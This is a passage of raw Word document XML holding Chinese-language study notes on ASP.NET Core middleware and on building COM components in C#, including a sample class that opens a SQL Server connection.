                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3587343" cy="2296665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每个委托均可在下一个委托前后执行操作。 此外，委托还可以决定不将请求传递给下一个委托，这就是对请求管道进行短路。 通常需要短路，因为这样可以避免不必要的工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用 </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/dotnet/api/microsoft.aspnetcore.builder.runextensions.run" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/dotnet/api/microsoft.aspnetcore.builder.mapextensions.map" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 和 </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/dotnet/api/microsoft.aspnetcore.builder.useextensions.use" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 扩展方法来配置请求委托。 可将一个单独的请求委托并行指定为匿名方法（称为并行中间件），或在可重用的类中对其进行定义。 这些可重用的类和并行匿名方法即为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中间件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，也叫中间件组件。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求管道中的每个中间件组件负责调用管道中的下一个组件，或使管道短路</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Run方法会使管道短路，所以最好把它放在最后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Use不会使管道短路，但也不会主动调用下一个管道，必须要显式调用await next();才能进入下一个管道。在UseWhen中可嵌套调用Use继续传递。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Map和MapWhen它可以匹配基于请求路径创建请求管道分支，默认会使管道短路，也可以嵌套Use继续传递。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些常用的中间件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>异常/错误处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>HTTP 严格传输安全协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>HTTPS 重定向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>静态文件服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Cookie 策略实施</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>身份验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/zh-cn/aspnet/core/fundamentals/middleware/?view=aspnetcore-2.1" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ASP.NET Core 中间件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l "顶部" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>回顶部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:firstLine="147"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b/>
          <w:color w:val="A52A2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        </w:rPr>
        <w:t>COM组件开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>什么是ActiveX?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一组符合COM规范的工具，让开发人员使用新的或已有的工具把计算机桌面环境与www集成起来。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>什么是OCX？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveX控制（OCX）是微软媒体运动的定义技术，这些控制使开发人员能够以无缝的方式通过www为最终用户提交完整的应用。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>面向对象的优缺点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面向对象解决了程序的向后兼容性，操作系统依赖性。OOP的接口是给外部函数调用的，私有函数只能够自己使用，外部无法访问，这就是封装性。当一个类继承另一个类时，它具有父类的接口，方法和字段，子类也能拓展新的方法。当不同的对象具有相同的接口时，它们就是多态的，这意味着开发人员可以开发通用的接口。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>为什么要为COM组件声明一个GUID？HTML的object标签的classid属性里的CLSID为什么正好与COM对象的GUID对应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUID标识一个对象的类标识或CLSID；或代表组件内的一个接口标识的IID。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了让COM把GUID和含有对象的实际文件关联起来，应该使用注册表。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>如何用C#开发一个COM组件？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请记住</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:想要把C#对象当作COM对象需要以下几点...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class必须是public的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属性,方法和事件必须是public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属性和方法必须在Interface里面定义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>事件必须在事件的接口中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>未在接口中定义的成员,而在实现里面是public的成员,对COM是不可见的,但是对其他的.NET程序是可见的.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了把属性和方法暴露给COM,你必须在接口中定义他们,并且把他们用DispId属性标记.暴露给COM的那些属性方法其实就在类的实现里面.他们必须被标记为public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每一个接口都要有一个GUID属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来看下连接数据库的例子：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴露的接口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[Guid("694C1820-04B6-4988-928F-FD858B95C880")]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public interface DBCOM_Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    [DispId(1)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    void Init(string userid , string password);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现类：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[Guid("9E5E5FB2-219D-4ee7-AB27-E4DBED8E123E"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ClassInterface(ClassInterfaceType.None),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ComSourceInterfaces(typeof(DBCOM_Events))]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public class DBCOM_Class : DBCOM_Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        private SqlConnection myConnection = null ; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        SqlDataReader myReader = null ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        public DBCOM_Class()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        public void Init(string userid , string password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            try</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                string myConnectString = "user id="+userid+";password="+password+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    ";Database=NorthWind;Server=SKYWALKER;Connect Timeout=30";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                myConnection = new SqlConnection(myConnectString);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                myConnection.Open();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                //MessageBox.Show("CONNECTED");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
